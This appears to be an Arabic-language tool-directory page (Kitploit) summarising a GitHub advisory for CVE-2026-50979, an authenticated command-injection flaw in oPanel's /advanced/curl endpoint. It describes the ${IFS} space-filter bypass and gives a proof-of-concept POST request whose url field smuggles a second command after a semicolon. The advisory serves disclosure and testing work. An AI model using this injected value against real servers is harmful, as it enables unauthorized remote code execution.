Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-50979 — تنفيذ كود عن بُعد مُوثَّق في oPanel عبر مكوّن 'advenced/curl' | Kitploit
أدوات/GitHubGitHub/bugresearch/cve-2026-50979
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةتطوير الحمولات
GitHubbugresearch/cve-2026-50979

CVE-2026-50979

تنفيذ كود عن بُعد مُوثَّق في oPanel عبر مكوّن 'advenced/curl'

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-50979: تنفيذ التعليمات البرمجية عن بُعد بعد المصادقة في oPanel

نظرة عامة

  • معرّف CVE: CVE-2026-50979
  • المنتج: oPanel
  • الإصدارات المتأثرة: v1.19.50 وما قبلها
  • نوع الثغرة: حقن أوامر بعد المصادقة / تنفيذ التعليمات البرمجية عن بُعد (RCE)
  • المكوّن المعرض للخطر: نقطة النهاية /advanced/curl
  • الخطورة: حرجة

الوصف

توجد ثغرة حقن أوامر في نقطة النهاية advanced/curl الخاصة بـ oPanel (الإصدارات v1.19.50 وما قبلها). لا يقوم التطبيق بتعقيم المدخلات المقدمة من المستخدم لمعامل url بشكل كافٍ قبل تمريرها إلى روتين تنفيذ curl الأساسي في النظام.

يمكن لمهاجم مصادق تجاوز قيود المسافات الأساسية باستخدام متغيرات الصدفة (مثل ${IFS}) وحقن أوامر نظام تشغيل اعتباطية (على سبيل المثال، باستخدام العامل ;). وهذا يسمح للمهاجم بتنفيذ تعليمات برمجية اعتباطية على الخادم الأساسي بصلاحيات تطبيق الويب.

التأثير

يتيح الاستغلال الناجح لمستخدم مصادق تنفيذ أوامر صدَفة اعتباطية على الخادم الذي يستضيف oPanel. ويمكن أن يؤدي ذلك إلى اختراق كامل للنظام، والوصول غير المصرح به إلى البيانات، ومزيد من الحركة الجانبية داخل الشبكة.

إثبات المفهوم (PoC)

يتم تفعيل الثغرة عن طريق إرسال طلب HTTP POST مصمم بعناية إلى نقطة النهاية المعرضة للخطر بعد نجاح المصادقة.

نقطة النهاية المعرضة للخطر: POST /advanced/curl (يتم الوصول إليها عادةً عبر المنفذ 2083)

بنية الحمولة الخبيثة:

root@kitploit:~
POST /advanced/curl HTTP/1.1
Host: <target_ip>:2083
Content-Type: application/x-www-form-urlencoded
Cookie: <valid_authentication_cookies>

url=[http://example.com/;id](http://example.com/;id)
تنزيل الأداة